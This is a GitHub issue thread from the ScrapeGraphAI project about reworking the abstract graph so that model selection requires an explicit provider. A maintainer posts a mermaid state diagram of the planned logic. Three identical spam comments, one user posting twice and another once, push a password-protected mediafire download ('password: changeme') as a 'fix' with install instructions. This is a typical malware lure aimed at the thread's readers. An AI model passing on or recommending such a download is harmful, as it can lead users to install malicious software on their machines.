### ISSUE TITLE
Abstract graph fix, round 4

### ISSUE THREAD

**Issue by f-aguzzi** [ScrapeGraphAI/Scrapegraph-ai#593]
**Describe the bug**
We had many issues and pull requests pop up because the logic in the abstract graph is still unclear and some cases are handled wrong.

These issues include, but are not limited to:
- #587 and #589 (groq)
- #581 (anthropic was already integrated, but there were problems accessing it)
- #588 (model instances?)
and older examples:
- #572

This is because we tried to keep the ability to pick models without specifying the provider, but that's only been a source of problems.

**To Reproduce**
Pick a model (gpt, groq, vertex, mistral) without specifying the provider.

**Expected behavior**
We should remove the possibility to pick a model without specifying the provider, and throw error messages accordingly. `This might be seen as a (partially) breaking change.`

**Proposed solution**
In the upcoming comments.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by f-aguzzi** [comment]
```mermaid
stateDiagram-v2
    [*] --> split_name
    split_name --> is_supported

    note right of split_name
    model_name -->
    provider + model
    end note

    is_supported --> check_tokens : provider exists
    is_supported --> throw_error : provider not supported
    throw_error --> [*] : exit with error

    state is_tokens <<fork>>
    state tokens_done <<join>>
    check_tokens --> is_tokens
    is_tokens --> tokens_provided : read from tokens dict
    is_tokens --> tokens_not_provided : set default tokens
    tokens_not_provided --> throw_warning
    tokens_provided --> tokens_done
    throw_warning --> tokens_done

    state instancing <<fork>>
    state end_instancing <<join>>
    tokens_done --> check_list
    check_list --> instancing
    instancing --> init_chat_model : yes
    instancing --> instance_manually : no
    init_chat_model --> end_instancing
    instance_manually --> end_instancing

    end_instancing --> [*] : exit correctly

    note right of check_list
    model supported by
    init_chat_model?
    end note

    note right of check_tokens
    check models_tokens
    dictionary for model
    end note
```

**Comment by VinciGit00** [comment]
please update to the new beta
